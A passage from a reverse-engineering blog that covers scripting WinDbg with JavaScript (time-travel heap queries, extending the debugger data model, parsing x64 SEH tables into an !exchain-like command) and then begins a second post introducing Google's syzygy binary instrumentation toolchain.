0:001> !tt F79:1B
Setting position: F79:1B
(1cfc.15e8): Break instruction exception - code 80000003 (first/second chance not available)
Time Travel Position: F79:1B
ntdll!TppWorkCallbackPrologRelease+0x100:
00007fff`c0761bd0 f30f7f8010170000 movdqu  xmmword ptr [rax+1710h],xmm0 ds:000000b8`7f4e7710=00000000000000000000000000000000

0:001> dt _TEB ActivityId
ntdll!_TEB
    +0x1710 ActivityId : _GUID

In the above example, you can see that the TppWorkCallbackPrologRelease function is zeroing the ActivityId GUID of the current TEB - magical.

TTD.Utility.GetHeapAddress

The two previous features were mostly building blocks; this utility consumes the TTD.Calls API in order to show the lifetime of a heap chunk in a trace session. What does that mean exactly? Well, the utility looks for every heap related operation that happened on a chunk (start address, size) and show them to you.

This is extremely useful when debugging or root-causing issues, and here is what it looks like on a dummy trace:

0:000> dx -g @$cursession.TTD.Utility.GetHeapAddress(0x21b5dce40a0)
========================================================================================================================================
=                           = Action   = Heap             = Address          = Size    = Flags  = (+) TimeStart = (+) TimeEnd = Result =
========================================================================================================================================
= [0x59] : [object Object]  - Alloc    - 0x21b5dcd0000    - 0x21b5dce4030    - 0xaa    - 0x8    - ED:7D7        - EF:7D       -        =
= [0x6b] : [object Object]  - Alloc    - 0x21b5dcd0000    - 0x21b5dce40a0    - 0xaa    - 0x8    - 105:D9        - 107:7D      -        =
= [0x6c] : [object Object]  - Free     - 0x21b5dcd0000    - 0x21b5dce40a0    -         - 0x0    - 107:8D        - 109:1D      - 0x1    =
= [0x276] : [object Object] - Alloc    - 0x21b5dcd0000    - 0x21b5dce4030    - 0x98    - 0x0    - E59:3A7       - E5A:8E      -        =
========================================================================================================================================

The attentive reader has probably noticed something maybe unexpected with entries 0x59 and entries 0x276 where we are seeing two different allocations of the same chunk without any free in between. The answer to this question lies in the way the GetHeapAddress function is implemented (check out the TTD\Analyzers\HeapAnalysis.js file) - it basically looks for every heap related operation and only shows you the ones where address + size is a range containing the argument you passed. In this example we gave the function the address 0x21b5dce40a0, 0x59 is an allocation and 0x21b5dce40a0 is in the range 0x21b5dce4030 + 0xAA so we display it. Now, a free does not know the size of the chunk, the only thing it knows is the base pointer. In this case if we have a free of 0x21b5dce4030 the utility function would just not display it to us which explains how we can have two heap chunks allocated without a free in the following time frame: ED:7D7, E59:3A7.

We can even go ahead and prove this by finding the free by running the below command:

0:000> dx -g @$cursession.TTD.Utility.GetHeapAddress(0x21b5dce4030).Where(p => p.Address == 0x21b5dce4030)
========================================================================================================================================
=                           = Action   = Heap             = Address          = Size    = Flags  = (+) TimeStart = (+) TimeEnd = Result =
========================================================================================================================================
= [0x61] : [object Object]  - Alloc    - 0x21b5dcd0000    - 0x21b5dce4030    - 0xaa    - 0x8    - ED:7D7        - EF:7D       -        =
= [0x64] : [object Object]  - Free     - 0x21b5dcd0000    - 0x21b5dce4030    -         - 0x0    - EF:247        - F1:1D       - 0x1    =
= [0x276] : [object Object] - Alloc    - 0x21b5dcd0000    - 0x21b5dce4030    - 0x98    - 0x0    - E59:3A7       - E5A:8E      -        =
========================================================================================================================================

As expected, the entry 0x64 is our free operation and it also happens in between the two allocation operations we were seeing earlier - solved.

Pretty neat uh?

It is nice enough to ask the utility for a specific heap address, but it would also be super nice if we had access to the whole heap activity that has happened during the session and that is what TTD.Data.Heap gives you:

0:000> dx @$HeapOps=@$cursession.TTD.Data.Heap()
...

0:000> dx @$HeapOps.Count()
@$HeapOps.Count() : 0x414

0:000> dx @$HeapOps[137]
@$HeapOps[137]                 : [object Object]
    Action           : Free
    Heap             : 0x21b5dcd0000
    Address          : 0x21b5dcee790
    Flags            : 0x0
    Result           : 0x1
    TimeStart        : 13A1:184 [Time Travel]
    TimeEnd          : 13A2:27 [Time Travel]

And of course do not forget that all these collections are queryable. We can easily find out what are all the other heap operations that are not alloc or free with the below query:

0:000> dx @$NoFreeAlloc=@$HeapOps.Where(c => c.Action != "Free" && c.Action != "Alloc")
...

0:000> dx -g @$NoFreeAlloc
============================================================================================================
=                           = Action    = Heap             = Result          = (+) TimeStart = (+) TimeEnd =
============================================================================================================
= [0x382] : [object Object] - Lock      - 0x21b5dcd0000    - 0xb87f4e3001    - 1ADE:602      - 1ADF:14     =
= [0x386] : [object Object] - Unlock    - 0x21b5dcd0000    - 0xb87f4e3001    - 1AE0:64       - 1AE1:13     =
= [0x38d] : [object Object] - Lock      - 0x21b5dcd0000    - 0xb87f4e3001    - 1B38:661      - 1B39:14     =
= [0x391] : [object Object] - Unlock    - 0x21b5dcd0000    - 0xb87f4e3001    - 1B3A:64       - 1B3B:13     =
= [0x397] : [object Object] - Lock      - 0x21b5dcd0000    - 0xb87f4e3001    - 1BF0:5F4      - 1BF1:14     =
= [0x399] : [object Object] - Unlock    - 0x21b5dcd0000    - 0xb87f4e3001    - 1BF1:335      - 1C1E:13     =
...

Extend the data model

After consuming all the various features available in the data model, I am sure you guys are wondering how you can go and add your own node and extend it. In order to do this, you can use the API host.namedModelParent.

class host.namedModelParent

An object representing a modification of the object model of the debugger.
This links together a JavaScript class (or prototype) with a data model.
The JavaScript class (or prototype) becomes a parent data model (e.g.: similar to a prototype)
to the data model registered under the supplied name. 

An instance of this object can be returned in the array of records returned from
the initializeScript method.

Let's say we would like to add a node that is associated with a Process called DiaryOfAReverseEngineer which has the following properties:

  • DiaryOfAReverseEngineer
  • Foo - string
  • Bar - string
  • Add - function
  • Sub
    • SubBar - string
    • SubFoo - string

Step 1: Attach a node to the Process model

Using host.namedModelParent you get the opportunity to link a Javascript class to the model of your choice. The other thing to understand is that this feature is made to be used by extension (as opposed to imperative) scripts.

Extension and imperative scripts are basically the same but they have different entry points: extensions use initializeScript (the command .scriptload invokes this entry point) and imperative scripts use invokeScript (the command .scriptrun invokes both the initializeScript and invokeScript). The small difference is that in an extension script you are expected to return an array of registration objects if you want to modify the data model, which is exactly what we want to do.

Anyway, let's attach a node called DiaryOfAReverseEngineer to the Process model:

//extendmodel_1.js
"use strict";

class ProcessModelParent {
    get DiaryOfAReverseEngineer() {
        return 'hello from ' + this.Name;
    }
}

function initializeScript() {
    return [new host.namedModelParent(
        ProcessModelParent,
        'Debugger.Models.Process'
    )];
}

Once loaded you can go ahead and check that the node has been added:

0:000> dx @$curprocess
@$curprocess                 : PING.EXE [Switch To]
    Name             : PING.EXE
    Id               : 0x1cfc
    Threads         
    Modules         
    Environment     
    TTD             
    DiaryOfAReverseEngineer : hello from PING.EXE

One important thing to be aware of in the previous example is that the this pointer is effectively an instance of the data model you attached to. In our case it is an instance of the Process model and as a result you can access every property available on this node, like its Name for example.

Step 2: Add the first level to the node

What we want to do now is to have our top node exposing two string properties and one function (we’ll deal with Sub later). This is done by creating a new Javascript class that represents this level, and we can return an instance of this said class in the DiaryOfReverseEngineer property. Simple enough uh?

//extendmodel_2.js
"use strict";

class DiaryOfAReverseEngineer {
    constructor(Process) {
        this.process = Process;
    }

    get Foo() {
        return 'Foo from ' + this.process.Name;
    }

    get Bar() {
        return 'Bar from ' + this.process.Name;
    }

    Add(a, b) {
        return a + b;
    }
}

class ProcessModelParent {
    get DiaryOfAReverseEngineer() {
        return new DiaryOfAReverseEngineer(this);
    }
}

function initializeScript() {
    return [new host.namedModelParent(
        ProcessModelParent,
        'Debugger.Models.Process'
    )];
}

Which gives:

0:000> dx @$curprocess
@$curprocess                 : PING.EXE [Switch To]
    Name             : PING.EXE
    Id               : 0x1cfc
    Threads         
    Modules         
    Environment     
    TTD             
    DiaryOfAReverseEngineer : [object Object]

0:000> dx @$curprocess.DiaryOfAReverseEngineer
@$curprocess.DiaryOfAReverseEngineer                 : [object Object]
    process          : PING.EXE [Switch To]
    Foo              : Foo from PING.EXE
    Bar              : Bar from PING.EXE

From the previous dumps there are at least two things we can do better:

1) The DiaryOfAReverseEngineer node has a string representation of [object Object] which is not great. In order to fix that we can just define our own toString method and return what we want.

2) When displaying the DiaryOfAReverseEngineer node, it displays the instance properties process where we keep a copy of the Process model we attached to. Now, this might be something you want to hide to the user as it has nothing to do with whatever this node is supposed to be about. To solve that, we just have to prefix the field with __.

(If you are wondering why we do not see the method Add you can force dx to display it with the -v flag.)

After fixing the two above points, here is what we have:

// extendmodel_2_1.js
"use strict";

class DiaryOfAReverseEngineer {
    constructor(Process) {
        this.__process = process;
    }

    get Foo() {
        return 'Foo from ' + this.__process.Name;
    }

    get Bar() {
        return 'Bar from ' + this.__process.Name;
    }

    Add(a, b) {
        return a + b;
    }

    toString() {
        return 'Diary of a reverse-engineer';
    }
}

class ProcessModelParent {
    get DiaryOfAReverseEngineer() {
        return new DiaryOfAReverseEngineer(this);
    }
}

function initializeScript() {
    return [new host.namedModelParent(
        ProcessModelParent,
        'Debugger.Models.Process'
    )];
}

And now if we display the Process model:

0:000> dx @$curprocess
@$curprocess                 : PING.EXE [Switch To]
    Name             : PING.EXE
    Id               : 0x1cfc
    Threads         
    Modules         
    Environment     
    TTD             
    DiaryOfAReverseEngineer : Diary of a reverse-engineer

0:000> dx @$curprocess.DiaryOfAReverseEngineer
@$curprocess.DiaryOfAReverseEngineer                 : Diary of a reverse-engineer
    Foo              : Foo from PING.EXE
    Bar              : Bar from PING.EXE

0:000> dx @$curprocess.DiaryOfAReverseEngineer.Add(1, 2)
@$curprocess.DiaryOfAReverseEngineer.Add(1, 2) : 0x3

Step 3: Adding another level and an iterable class

At this stage, I am pretty sure that you guys are starting to get the hang of it. In order to add a new level, you can just define yet another class, define a property in the DiaryOfAReverseEngineer class and return an instance of it. And that's basically it.

The last concept I wanted to touch on before moving on is how to add the iterable property on one of your data model classes. Let's say you have a class called Attribute that stores a key and a value, and let's also say you have another class called Attributes that is an Attribute store. The thing is, you might have noticed that one class instance usually corresponds to a node with its own properties in the data model view. This is not great for our Attributes class as it is basically an array of Attribute objects, meaning that we will have two copies of everything..

If you want to have the debugger be able to iterate on your instance you can define a *[Symbol.iterator]() method like this:

// Attributes iterable
class Attribute {
    constructor(Process, Name, Value) {
        this.__process = Process;
        this.Name = Name;
        this.Value = Value;
    }

    toString() {
        let S = 'Process: ' + this.__process.Name + ', ';
        S += 'Name: ' + this.Name + ', ';
        S += 'Value: ' + this.Value;
        return S;
    }
}

class Attributes {
    constructor() {
        this.__attrs = [];
    }

    push(Attr) {
        this.__attrs.push(Attr);
    }

    *[Symbol.iterator]() {
        for (let Attr of this.__attrs) {
            yield Attr;
        }
    }

    toString() {
        return 'Attributes';
    }
}

Now if we put it all together we have:

// extendmodel.js
"use strict";

class Attribute {
    constructor(Process, Name, Value) {
        this.__process = Process;
        this.Name = Name;
        this.Value = Value;
    }

    toString() {
        let S = 'Process: ' + this.__process.Name + ', ';
        S += 'Name: ' + this.Name + ', ';
        S += 'Value: ' + this.Value;
        return S;
    }
}

class Attributes {
    constructor() {
        this.__attrs = [];
    }

    push(Attr) {
        this.__attrs.push(Attr);
    }

    *[Symbol.iterator]() {
        for (let Attr of this.__attrs) {
            yield Attr;
        }
    }

    toString() {
        return 'Attributes';
    }
}

class Sub {
    constructor(Process) {
        this.__process = Process;
    }

    get SubFoo() {
        return 'SubFoo from ' + this.__process.Name;
    }

    get SubBar() {
        return 'SubBar from ' + this.__process.Name;
    }

    get Attributes() {
        let Attrs = new Attributes();
        Attrs.push(new Attribute(this.__process, 'attr0', 'value0'));
        Attrs.push(new Attribute(this.__process, 'attr1', 'value0'));
        return Attrs;
    }

    toString() {
        return 'Sub module';
    }
}

class DiaryOfAReverseEngineer {
    constructor(Process) {
        this.__process = Process;
    }

    get Foo() {
        return 'Foo from ' + this.__process.Name;
    }

    get Bar() {
        return 'Bar from ' + this.__process.Name;
    }

    Add(a, b) {
        return a + b;
    }

    get Sub() {
        return new Sub(this.__process);
    }

    toString() {
        return 'Diary of a reverse-engineer';
    }
}

class ProcessModelParent {
    get DiaryOfAReverseEngineer() {
        return new DiaryOfAReverseEngineer(this);
    }
}

function initializeScript() {
    return [new host.namedModelParent(
        ProcessModelParent,
        'Debugger.Models.Process'
    )];
}

And we can play with the node in the model:

0:000> dx @$curprocess
@$curprocess                 : PING.EXE [Switch To]
    Name             : PING.EXE
    Id               : 0x1cfc
    Threads         
    Modules         
    Environment     
    TTD             
    DiaryOfAReverseEngineer : Diary of a reverse-engineer

0:000> dx @$curprocess.DiaryOfAReverseEngineer
@$curprocess.DiaryOfAReverseEngineer                 : Diary of a reverse-engineer
    Foo              : Foo from PING.EXE
    Bar              : Bar from PING.EXE
    Sub              : Sub module

0:000> dx @$curprocess.DiaryOfAReverseEngineer.Sub
@$curprocess.DiaryOfAReverseEngineer.Sub                 : Sub module
    SubFoo           : SubFoo from PING.EXE
    SubBar           : SubBar from PING.EXE
    Attributes       : Attributes

0:000> dx @$curprocess.DiaryOfAReverseEngineer.Sub.Attributes
@$curprocess.DiaryOfAReverseEngineer.Sub.Attributes                 : Attributes
    [0x0]            : Process: PING.EXE, Name: attr0, Value: value0
    [0x1]            : Process: PING.EXE, Name: attr1, Value: value0

0:000> dx @$curprocess.DiaryOfAReverseEngineer.Sub.Attributes[0]
@$curprocess.DiaryOfAReverseEngineer.Sub.Attributes[0]                 : Process: PING.EXE, Name: attr0, Value: value0
    Name             : attr0
    Value            : value0

Another simpler example is available in Determining process architecture with JavaScript and LINQ where the author adds a node to the Process node that tells you with which bitness the process is running on, either 64 or 32 bits.

If you want to extend the data model with best practices you should also have a look at Debugger Data Model Design Considerations which sort of lays down various guidelines.

Misc

In this section I will try to answer a bunch of other questions and share various tricks that have been useful for me - you might learn a thing or two!

Try and play with host.* API from the command window

One of the things I quickly was bothered with at first is not being able to run my Javascript from the command window. Let's say that you want to play with a host.* API: these are not really directly accessible.

A way to work around that is to load a script and to use the @$scriptContents variable from where you can access the host object.

0:000> dx -v @$scriptContents.host
@$scriptContents.host                 : [object Object]
    currentApiVersionSupported : [object Object]
    currentApiVersionInitialized : [object Object]
    diagnostics      : [object Object]
    metadata         : [object Object]
    typeSignatureRegistration
    typeSignatureExtension
    namedModelRegistration
    namedModelParent
    functionAlias   
    namespacePropertyParent
    optionalRecord  
    apiVersionSupport
    Int64           
    parseInt64      
    namespace       
    evaluateExpression
    evaluateExpressionInContext
    getModuleSymbol 
    getModuleSymbolAddress
    setModuleSymbol 
    getModuleType   
    createPointerObject
    createTypedObject
    indexedValue    
    getNamedModel   
    registerNamedModel
    unregisterNamedModel
    registerPrototypeForTypeSignature
    registerExtensionForTypeSignature
    unregisterPrototypeForTypeSignature
    unregisterExtensionForTypeSignature
    currentSession   : Time Travel Debugging Mode
    currentProcess   : PING.EXE [Switch To]
    currentThread    [Switch To]
    memory           : [object Object]
    typeSystem       : [object Object]
    ToDisplayString  [ToDisplayString([FormatSpecifier]) - Method which converts the object to its display string representation according to an optional format specifier]

Note that this is also super useful if you want to wander around and get a feel for the various features / APIs that have not been documented yet (or you were just not aware of).

How to load an extension script

The .scriptload command is available in both Windbg Preview and the Windbg from the SDK.

How to run an imperative script

Similar to above, you can use the .scriptrun command for that.

Is the Javascript engine only available in Windbg Preview?

Nope it is not! You can load your Javascript scripts from the latest SDK's Windbg. You can use the .scriptproviders command to know what the various script providers currently loaded are, and if you do not see the Javascript provider you can just run .load jsprovider.dll to load it.

0:003> .scriptproviders
Available Script Providers:
    NatVis (extension '.NatVis')

0:003> .load jsprovider.dll

0:003> .scriptproviders
Available Script Providers:
    NatVis (extension '.NatVis')
    JavaScript (extension '.js')

How to debug a script?

One thing I have not experimented with yet is the .scriptdebug command that lets you debug a script. This is a very important feature as without it it can be a bit of a pain to figure out what is going wrong and where. If you want to know more about this, please refer to Script Debugging Walkthrough from Andy Luhrs.

How to do Nat-Vis style visualizer in Javascript?

I did not cover how to write custom visualizer in Javascript but you should look at host.typeSignatureRegistration to register a class that is responsible for visualizing a type (every property of the class will be used as the main visualizers for the type).

Get a value out of a typed object

Sometimes you are accessing a Javascript object that behaves like a structure instance -- you can access its various fields seamlessly (e.g. you want to access the TEB through the EnvironmentBlock object). This is great. However, for various reasons you might need to get the raw value of a field (e.g. for doing arithmetic) and for that you can use the address property:

// address property
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function invokeScript() {
    let CurrentThread = host.currentThread;
    let TEB = CurrentThread.Environment.EnvironmentBlock;
    logln(TEB.FlsData);
    logln(TEB.FlsData.address);  
}

Which gives:

0:000>
[object Object]
2316561115408

0:000> dx @$curthread.Environment.EnvironmentBlock.FlsData
@$curthread.Environment.EnvironmentBlock.FlsData : 0x21b5dcd6910 [Type: void *]

Evaluate expressions

Another interesting function I wanted to mention is host.evaluateExpression. As the name suggests, it allows you to evaluate an expression; it is similar to when you use the dx operator but you can only use the language syntax (this means no ‘!’). Any expression you can evaluate through dx, you can evaluate through host.evaluateExpression. The neat thing about this, is that the resulting expression keeps the type information and as a result the Javascript object behaves like the type of the expression.

Here is a small example showing what I am trying to explain:

// host.evaluateExpression
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function invokeScript() {
    logln(host.evaluateExpression('(unsigned __int64)0'));
    logln(host.evaluateExpression('(unsigned __int64*)0'));
    logln(host.evaluateExpression('(_TEB*)0xb87f4e4000').FlsData);
    logln(host.evaluateExpression('(_TEB*)0xb87f4e4000').FlsData.address);
    try{
        logln(host.evaluateExpression('(unsigned __int64*)0').dereference());
    } catch(e) {
        logln(e);
    }
    // not valid: @$ is not part of the language - logln(host.evaluateExpression('@$teb'));
    // not valid: @rsp is not part of the language - logln(host.evaluateExpression('(unsigned __int64)@rsp'));
    // not valid: '!' is not part of the language - logln(host.evaluateExpression('((ntdll!_TEB*)0)'))
}

Resulting in:

0:000>
0
[object Object]
[object Object]
2316561115408
Error: Unable to read memory at Address 0x0

How to access global from modules

If you need to get access to a global in a specific module, you can use the function host.getModuleSymbol which returns one of those magic Javascript object behaving like a structure. You can check out an example in the following article: Implementation logic for the COM global interface table.

x64 exception handling vs Javascript

Phew, you made it to the last part! This one is more about trying to do something useful with all the small little things we have learned throughout this article.

I am sure you guys all already know all of this but Windows revisited how exception handling and frame unwinding work on its 64 bit operating systems. Once upon a time the exception handlers could be found directly onto the stack and they formed some sort of linked list. Today, the compiler encodes every static exception handler at compile / link time into various tables embedded into the final binary image.

Anyway, you might know about Windbg's !exchains command that displays the current exception handler chain. This is what the output looks like:

(9a0.14d4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
except!Fault+0x3d:
00007ff7`a900179d 48c70001000000  mov     qword ptr [rax],1 ds:00000000`00000001=????????????????

0:000> !exchain
8 stack frames, scanning for handlers...
Frame 0x01: except!main+0x59 (00007ff7`a9001949)
    ehandler except!ILT+900(__GSHandlerCheck_SEH) (00007ff7`a9001389)
Frame 0x03: except!__scrt_common_main_seh+0x127 (00007ff7`a9002327)
    ehandler except!ILT+840(__C_specific_handler) (00007ff7`a900134d)
Frame 0x07: ntdll!RtlUserThreadStart+0x21 (00007ff8`3802efb1)
    ehandler ntdll!_C_specific_handler (00007ff8`38050ef0)

And here is the associated C code:

// except.c
__declspec(noinline) void Fault(uintptr_t *x) {
    printf("I'm about to fault!");
    *(uintptr_t*)x= 1;
}

int main(int argc, char **argv)
{
    __try {
        printf("Yo!\n");
        Fault((uintptr_t*)argc);
    }
    __except (Filter()) {
        printf("Exception!");
    }
    return EXIT_SUCCESS;
}

As you can see, it is not obvious from the dump above to identify the Filter function and the __except code block.

I figured it would be a good exercise to parse those tables (at least partially) from Javascript, expose the information inside the data model, and write a command similar to !exchain - so let's do it.

A few words about ImageRuntimeFunctionEntries, UnwindInfos, SehScopeTables and CSpecificHandlerDatas

Before giving you the script, I would just like to spend a bit of time to give you a brief overview of how this information is encoded and embedded inside a PE32+ binary. Note that I am only interested by x64 binaries coded in C; in other words I am focusing on SEH (__try / __except) as opposed to C++ EH (try / catch).

The first table we need to look at is the ENTRY_EXCEPTION table that resides in the DataDirectory of the OptionalHeader. This directory is an array of IMAGE_RUNTIME_FUNCTION_ENTRY that describes the boundary of functions (handy for IDA!) and their unwinding information which is stored at the end of this structure.

The unwinding information is mainly described by the UNWIND_INFO structure in which the frame unwinder can find what is necessary to unwind a stack-frame associated to this function. The array of UNWIND_CODE structures basically tells you how to do an epilogue.

What follows this array is variable though (documented here): if the Flags field of UNWIND_INFO specifies the EHHANDLER flag then we have what I call a UNWIND_INFO_END structure defined like this:

0:000> dt UNWIND_INFO_END
    +0x000 ExceptionHandler : Uint4B
    +0x004 ExceptionData    : Uint4B

This is basically where !exchains stops -- the ehhandler address in the output is the ExceptionHandler field. This is basically an RVA to a function that encapsulates the exception handling for this function. This is not to be confused with either your Filter function or your __except block, this is a generic entry-point that the compiler generates and can be used for other functions too. This function is invoked by the exception dispatching / handling code with an argument that is the value of ExceptionData. ExceptionData is basically an RVA to a blob of memory that the ExceptionHandler function knows how to read and takes actions on. This is where the information we are after is stored.

This is also where it was a bit of a surprise to me, as you basically cannot really tell for sure what type of structure is referenced by ExceptionData. For that, you would have to analyze the ExceptionHandler function to understand what and how this data is used. That is also most likely, why the !exchains command stops here and does not bother trying to parse the exception data blob.

Obviously we can easily make an assumption and assume that the ExceptionData is the structure we would like it to be, and verify that it looks right. In addition, the fact that the code you are most likely looking at has been emitted by a well behaved compiler and that the binary has not been tampered with combined have given me good enough results. But keep in mind that in theory, you could place your own function and have your own ExceptionData format in which case reverse-engineering the handler would be mandatory - in practice this is an unlikely scenario if you are dealing with normal binaries.

The type of ExceptionData that we are interested in is what I call a SEH_SCOPE_TABLE which is an array of SCOPE_RECORDs that are defined like this:

0:000> dt SEH_SCOPE_TABLE
    +0x000 Count            : Uint4B
    +0x004 ScopeRecord      : [1] SCOPE_RECORD

0:000> dt SCOPE_RECORD
    +0x000 BeginAddress     : Uint4B
    +0x004 EndAddress       : Uint4B
    +0x008 HandlerAddress   : Uint4B
    +0x00c JumpTarget       : Uint4B

BeginAddress and EndAddress give you the __try block RVA, HandlerAddress encodes either the Filter function or the start of the __finally block. The JumpTarget field tells you if you are looking at either a __try / __except or a __try / __finally. Also, the current heuristic I use to know if the SCOPE_RECORD looks legit or not is to ensure that the __try block resides in between the boundaries of the function the handler is defined in. This has been working well so far - at least on the binaries I have tried it on, but I would not be that surprised if there exists some edge cases to this; if you know any feel free to hit me up!

Putting it all together

All right, so now that we sort of know how to dig out the information we are interested in, you can check the script I came up with: parse_eh_win64.js.

This extends both the Process and the Module models. In both of those models it adds a Functions node as well as a ExceptionHandlers node. Each node under Functions has an ExceptionHandlers node too.

This basically means that you can now:

  • Get every exception handler registered in the process regardless of which module it is coming from (using Process.ExceptionHandlers)
  • Get every exception handler registered by a specific module (using Module.ExceptionHandlers)
  • Get every function in the process address space (using Process.Functions)
  • Get every function in a specific module (using Module.Functions)
  • Get every exception handler defined by a specific function (using either Module.Functions[x].ExceptionHandlers or Process.Functions[x].ExceptionHandlers)

With the same source of information we can easily filter and shape the way we want it displayed through the data model. There is no need to display every exception handler from the Module node as it would not be information related to a Module -- this is why we choose to filter it out and display only the ones concerning this Module. Same thing reasoning applies to Functions as well. The model is something you should explore step by step, it is not something where you have all the available information displayed at once - it is meant to be scoped and not overwhelming.

And just in case you forgot about it, all this information is now accessible from the command window for query purposes. You can ask things like Which function defines the most exception handlers? very easily:

0:000> dx @$curprocess.Functions.OrderByDescending(c => c.ExceptionHandlers.Count()).First()
@$curprocess.Functions.OrderByDescending(c => c.ExceptionHandlers.Count()).First()                 : RVA:0x7ff83563e170 -> RVA:0x7ff83563e5a2, 12 exception handlers
    EHHandlerRVA     : 0x221d6
    EHHandler        : 0x7ff8356021d6
    BeginRVA         : 0x5e170
    EndRVA           : 0x5e5a2
    Begin            : 0x7ff83563e170
    End              : 0x7ff83563e5a2
    ExceptionHandlers :   __try {0x7ff83563e1d2 -> 0x7ff83563e37a} __finally {0x7ff83563e5a2}...

0:000> u 0x7ff83563e170 l1
KERNEL32!LoadModule:
00007ff8`3563e170 4053            push    rbx

In this example, the function KERNEL32!LoadModule seems to be the function that has registered the largest number of exception handlers (12 of them).

Now that we have this new source of information, we can also push it a bit further and implement a command that does a very similar job than !exchain by just mining information from the nodes we just added to the data model:

0:000> !ehhandlers
9 stack frames, scanning for handlers...
Frame 0x1: EHHandler: 0x7ff7a9001389: except!ILT+900(__GSHandlerCheck_SEH):
                Except: 0x7ff7a900194b: except!main+0x5b [c:\users\over\documents\blog\except\except\except.c @ 28]:
                Filter: 0x7ff7a9007e60: except!main$filt$0 [c:\users\over\documents\blog\except\except\except.c @ 27]:
Frame 0x3: EHHandler: 0x7ff7a900134d: except!ILT+840(__C_specific_handler):
                Except: 0x7ff7a900235d: except!__scrt_common_main_seh+0x15d [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 299]:
                Filter: 0x7ff7a9007ef0: except!`__scrt_common_main_seh'::`1'::filt$0 [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 299]:
Frame 0x7: EHHandler: 0x7ff838050ef0: ntdll!_C_specific_handler:
                Except: 0x7ff83802efc7: ntdll!RtlUserThreadStart+0x37:
                Filter: 0x7ff8380684d0: ntdll!RtlUserThreadStart$filt$0:
@$ehhandlers()  

0:000> !exchain
8 stack frames, scanning for handlers...
Frame 0x01: except!main+0x59 (00007ff7`a9001949)
    ehandler except!ILT+900(__GSHandlerCheck_SEH) (00007ff7`a9001389)
Frame 0x03: except!__scrt_common_main_seh+0x127 (00007ff7`a9002327)
    ehandler except!ILT+840(__C_specific_handler) (00007ff7`a900134d)
Frame 0x07: ntdll!RtlUserThreadStart+0x21 (00007ff8`3802efb1)
    ehandler ntdll!_C_specific_handler (00007ff8`38050ef0)

We could even push it a bit more and have our command returns structured data instead of displaying text on the output so that other commands and extensions could build on top of it.

EOF

Wow, sounds like you made it to the end :-) I hope you enjoyed the post and ideally it will allow you to start scripting Windbg with Javascript pretty quickly. I hope to see more people coming up with new scripts and/or tools based on the various technologies I touched on today. As usual, big thanks to my buddy yrp604 for proofreading and edits.

If you are still thirsty for more information, here is a collection of links you should probably check out:

Binary rewriting with syzygy, Pt. I

Introduction

Binary instrumentation and analysis have been subjects that I have always found fascinating. At compile time via clang, or at runtime with dynamic binary instrumentation frameworks like Pin or DynamoRIO. One thing I have always looked for though, is a framework able to statically instrument a PE image. A framework designed a bit like clang where you can write 'passes' doing various things: transformation of the image, analysis of code blocks, etc. Until a couple of months ago, I wasn't aware of any public and robust projects providing this capability (as in, able to instrument real-world scale programs like Chrome or similar).

In this post (it's been a while I know!), I'll introduce the syzygy transformation tool chain with a focus on its instrumenter, and give an overview of the framework, its capabilities, its limitations, and how you can write transformations yourself. As examples, I'll walk through two simple examples: an analysis pass generating a call-graph, and a transformation pass rewriting the function __report_gsfailure in /GS protected binaries.

Syzygy

Introduction and a little bit of History

syzygy is a project written by Google labeled as a "transformation tool chain". It encompasses a suite of various utilities: instrument.exe is the application invoking the various transformation passes and apply them on a binary, grinder.exe, reorder.exe, etc. In a nutshell, the framework is able to (non exhaustive list):

  • Read and write PDB files,
  • 'Decompose' PE32 binaries built with MSVC (with the help of full PDB symbol),
  • Assemble Intel x86 32 bits code,
  • Disassemble Intel x86 32 bits code (via Distorm),
  • 'Relink' an instrumented binary.

You also may have briefly heard about the project a while back in this post from May 2013 on Chromium's blog: Testing Chromium: SyzyASAN, a lightweight heap error detector. As I am sure you all know, AddressSanitizer is a compile-time instrumentation whose purpose is to detect memory errors in C/C++ programs. Long story short, AddressSanitizer tracks the state of your program's memory and instrument memory operations (read / write / heap allocation / heap free) at runtime to make sure that they are 'safe'. For example, in a normal situation reading off by one out-of-bounds on a static sized stack buffer will most likely not result in a crash. AddressSanitizer's job is to detect this issue and to report it to the user.

Currently there is no real equivalent on Windows platforms. The only supported available technology that could help with detecting memory errors is the Page Heap. Even though today, clang for Windows is working (Chrome announced that Windows builds of Chrome now use clang), this was not the case back in 2013. As a result, Google built SyzyASAN, which is the name of a transformation aiming at detecting memory errors in PE32 binaries. This transform is built on top of the syzygy framework, and you can instrument your binary with it via the instrument.exe tool. One consequence of the above, is that the framework has to be robust and accurate enough to instrument Chrome; as a result the code is heavily tested which is awesome for us (it is also nearly the only documentation available too 0:-))!

Compiling

In order to get a development environment setup you need to follow specific steps to get all the chromium build/dev tools installed. depot_tools is the name of the package containing everything you need to properly build the various chromium projects; it includes things like Python, GYP, Ninja, git, etc.

Once depot_tools is installed, it is just a matter of executing the below commands for getting the code and compiling it:

> set PATH=D:\Codes\depot_tools;%PATH%
> mkdir syzygy
> cd syzygy
> fetch syzygy
> cd syzygy\src
> ninja -C out\Release instrument

If you would like more information on the matter, I suggest you read this wiki page: SyzygyDevelopmentGuide.

Terminology

The terminology used across the project can be a bit misleading or confusing at first, so it is a good time to describe the key terms and their meanings: a BlockGraph is a basically a container of blocks. A BlockGraph::Block can be either a code block, or a data block (the IMAGE_NT_HEADERS. Every block has various properties like an identifier, a name, etc. and belongs to a section (as in PE sections). Most of those properties are mutable, and you are free to play with them and they will get picked-up by the back-end when relinking the output image. In addition to being a top-level container of blocks, the BlockGraph also keeps track of the sections in your executable. Blocks also have a concept of referrers and references. A reference is basically a link from Block foo to Block bar; where bar is the referent. A referrer can be seen as a cross-reference (in the IDA sense): foo would be a referrer of bar. These two key concepts are very important when building transforms as they also allow you to walk the graph faster. Transferring referrers to another Block is also a very easy operation for example (and is super powerful).

Something that also got me confused at first is their name for a Block is not a basic-block as we know them. Instead, it is a function; a set of basic-blocks. Another key concept being used is called SourceRanges. As Blocks can be combined together or split, they are made so that they look after their own address-space mapping bytes from the original image to bytes in the block.

Finally, the container of basic-blocks as we know them is a BasicBlockSubGraph (I briefly mention it a bit later in the post).

